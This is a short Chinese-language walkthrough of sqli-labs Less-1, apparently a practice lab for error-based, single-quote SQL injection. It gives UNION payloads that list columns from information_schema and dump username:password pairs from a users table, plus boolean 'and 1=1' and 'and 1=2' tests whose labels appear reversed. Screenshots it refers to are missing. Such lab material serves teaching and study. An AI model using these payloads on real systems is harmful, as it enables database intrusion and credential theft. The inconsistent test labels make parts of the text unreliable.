Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
方法一:手工UNION联合查询注入
输入单引号,页面错误,如下:
根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,
猜想:咱们输入的1在数据库中出现的位置为:select … from … where id=’1’ …,
也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,
暴库
得到数据库的库名
采用order by语句进行递归查询
1.查询到3还是没有回显信息
2.一直查询到4,出现回显信息。
暴字段名
?id=0’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
暴值
?id=0’ union select 1,2,group_concat(username,0x3a,password) from users–+
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’ ,用以分割pasword和username。
方法二: 手工注入报错
?id=1’ and 1=1–+ //错误
?id=1’ and 1=2–+ //正确